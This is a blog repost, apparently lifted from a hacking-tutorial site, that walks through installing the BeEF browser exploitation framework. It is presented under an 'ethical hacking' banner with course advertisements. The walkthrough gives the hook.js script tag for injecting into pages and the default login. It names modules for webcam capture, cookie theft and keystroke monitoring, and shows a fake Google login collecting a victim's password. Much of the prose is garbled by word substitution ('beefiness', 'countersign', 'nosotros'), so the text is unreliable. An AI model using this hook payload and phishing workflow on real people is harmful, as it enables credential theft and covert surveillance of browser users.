Why Doesnt Beef Work as a Password

People use browsers for all types of things, and in general, nosotros trust a lot of personal data to them. That'due south why browsers are a perfect attack surface for a hacker, because the target may not even know they are infected and feed you all of the information yous could want.

To practice this, you lot need to first trick the user into clicking a link. To generate the link, you can use a tool called BeEF, which used to exist preinstalled on Kali Linux.

Like to Metasploit, BeEF, which stands for Browser Exploitation Framework, is a framework for launching attacks. Different with Metasploit, it's specific to launching attacks against web browsers. In some cases, we could use BeEF in conjunction with Metasploit to start more advanced set on scenarios.

• Don't Miss: Take hold of an Internet Catfish with Grabify Tracking Links

The tool was developed by a group of developers led by Wade Alcorn. Built on the familiar Ruby on Rails platform, Beef was designed to explore the vulnerabilities in browsers and exam them. In detail, Beefiness is an excellent platform for testing a browser'southward vulnerability to cantankerous-site scripting (XSS) and other injection attacks.

BeEF can generate a link that tin track the target and fifty-fifty run modules to both escalate permissions and assemble more information about the person behind the computer. It can even scan backside the network the person's on, which is pretty impressive since you lot tin can take pictures with their webcam, run across what they're typing, and launch phishing pages to attempt and get credentials.

Step 1: Install BeEF

Beef is built right into Kali Linux 2019.2 and older, so yous shouldn't have to install anything if you're running one of those versions on your computer.

In mid-2019, Kali removed BeEF as a preinstalled exploitation tool, moving information technology from "kali-linux-default" to the "kali-linux-big" metapackage. That means that if y'all installed a fresh version of Kali, you would no longer have Beefiness, though, you may retain it if you lot simply updated your older version of Kali to 2019.3 or higher.

If you already have information technology, use the post-obit control to update everything. And if you lot don't have it, the same command will install it. Just make sure to use beef-xss and not "beef" considering the latter is a programming language interpreter, which is different. (We made that fault in our video higher up, then don't do the same.)

            ~$ sudo apt install beefiness-xss          

Whether y'all had it preinstalled from before or had to install information technology, the rest is the same.

Step 2: Open up the Beef Service

Once Beefiness is installed, you lot can find it nether Applications –> System Services, so click on "beef start." It will open a concluding window to start the service.

If you don't run into whatsoever beef-related tools in that folder, or if you don't see that folder at all, you lot may have installed "beefiness" and not "beefiness-xss" and so make sure to do the latter. (You can also beginning BeEF from the Exploitation Tools folder where it's "beefiness xss framework.)

            > Executing "sudo beef-xss" [sudo] password for kali:  [-] Yous are using the Default credentials [-] (Password must be different from "beefiness") [-] Please type a new countersign for the beefiness user:  [*] Please wait for the BeEF service to get-go. [*] [*] Yous might need to refresh your browser once it opens. [*] [*]  Web UI: http://127.0.0.one:3000/ui/console [*]    Claw: <script src="http://<IP>:3000/hook.js"></script> [*] Example: <script src="http://127.0.0.i:3000/hook.js"></script>  ● beefiness-xss.service - LSB: BeEF      Loaded: loaded (/etc/init.d/beefiness-xss; generated)      Active: agile (running) since Fri 2020-05-08 12:51:38 EDT; 5s ago        Docs: homo:systemd-sysv-generator(viii)     Process: 1432 ExecStart+/etc/init.d/beefiness-xss start (code=excited, status=0/SUCCESS)       Tasks: ten (limit: 6715)      Memory: 140.8M      CGroup: /system.piece/beef-xss.service              └─1438 scarlet /usr/share/beef-xss/beef  May 08 12:51:42 kali beef[i]: Starting LSB: Beefiness... May 08 12:51:42 kali beef[one]: Started LSB: BeEF.  [*] Opening Spider web UI (http://127.0.0.1:3000/ui/console) in: v... 4... 3... two... i...          

If you meet errors where your browser fails to load, you can featherbed the issue by opening up your preferred web browser, like Firefox or Chrome, and going to the following URL, which is for the localhost (127.0.0.1) web server at port 3000.

            http://127.0.0.1:3000/ui/console          

Step three: Log in to the BeEF Service

In one case the browser interface opens, you'll need to log in to the BeEF service. The default credentials are beef for the username and beefiness for the countersign. However, you may have been prompted to create a countersign for your beef session (as seen above), and in that instance, you would use beef as the username and whatever password y'all chose.

After logging in successfully, y'all should run into the "Getting Started" page with information about how Beefiness works. On the left, there'southward the Hooked Browsers column, which is where all the browsers y'all control volition end up.

Step 4: Hook the Target Browser

The key to success with Beef is to "hook" a browser. This basically ways that we need the target to visit a vulnerable spider web app with the "hook.js" JavaScript file. To practice, Beef provides a webpage for your localhost with the payload in information technology, so visit that to see how information technology works.

            http://127.0.0.i:3000/demos/basic.html          

The injected code in the hooked browser responds to commands from the BeEF server that we control. From at that place, we tin can practise many mischievous things on the target's computer.

Footstep v: View the Browser Details

I've got a few hooked browsers, but I'm going to look at the Chrome one. Click on your hooked browser, and it volition jump you to the "Details" tab, which provides information virtually the hooked browser. Mine shows up every bit Chrome in the values.

This tab will show yous a lot more that. For me, I meet that the platform is Linux x86_64; that information technology has the Chrome PDF Plugin, Chrome PDF Viewer, and Native Client plugins; the components include webgl, webrtc, and websocket; and other interesting information.

Step 6: Execute Commands in the Browser

Now that we accept hooked the target'due south browser, we tin can execute some of the congenital-in modules from the "Commands" tab.

There are over 300 modules, from browser hacks to social engineering, including, but certainly not limited to:

• Get Visited Domains (browser)
• Go Visited URLs (browser)
• Webcam (browser)
• Go All Cookies (extension)
• Grab Google Contacts (extension)
• Screenshot (extension)
• Steal Autocomplete (social engineering)
• Google Phishing (social engineering)

When you find a module you want to use, select it, then click "Execute" nether its description. As an example, I'grand going to utilise the "Google Phishing" module in the "Social Engineering" folder.

Subsequently executing information technology, a imitation Gmail login folio will appear in the hooked browser. The user may not think twice well-nigh inserting their username and password, and once they do, we log information technology. Afterward, they are directed back to Google's site as if they logged in regularly.

To notice the username and password nosotros logged, just click on the command in the Module Results History column. For me, I run into "hfhfhf" as the user and "sdliasdflihasdflh" as the password. Y'all can as well view this data from the "Logs" tab.

• Don't Miss: Phish for Social Media & Other Account Passwords with BlackEye

If we wanted to, we could customize the URL that the Google Phishing module uses, in case you desire to apply something more than believable than the sometime-style Gmail interface.

Once nosotros have the browser hooked, there are near unlimited possibilities of what nosotros can practise. Y'all could even leverage Beefiness for operating system attacks. For more examples of what BeEF tin help you achieve, such as gaining access to the webcam and monitoring keystrokes, cheque out our Cyber Weapons Lab video above.

BeEF Is a Powerful Web Browser Assault Tool

Beef is an extraordinary and powerful tool for exploiting spider web browsers, and it's a terrifying example of why you should never click on suspicious links. Even if things look fine, you should exist really conscientious with annihilation that pops upward in your browser for permission to access your webcam or audio or that needs y'all to enter in account credentials.

Want to kickoff making money as a white hat hacker? Jump-outset your hacking career with our 2020 Premium Ethical Hacking Certification Training Packet from the new Cypher Byte Store and get over threescore hours of training from cybersecurity professionals.

Buy Now (90% off) >

Other worthwhile deals to check out:

• 97% off The Ultimate 2021 White Lid Hacker Certification Bundle
• 99% off The 2021 All-in-One Data Scientist Mega Packet
• 98% off The 2021 Premium Learn To Code Certification Bundle
• 62% off MindMaster Mind Mapping Software: Perpetual License

Cover photo and screenshots by Justin Meyers/Nil Byte

shivermagas1938.blogspot.com

Source: https://null-byte.wonderhowto.com/how-to/hack-web-browsers-with-beef-control-webcams-phish-for-credentials-more-0159961/

Share this post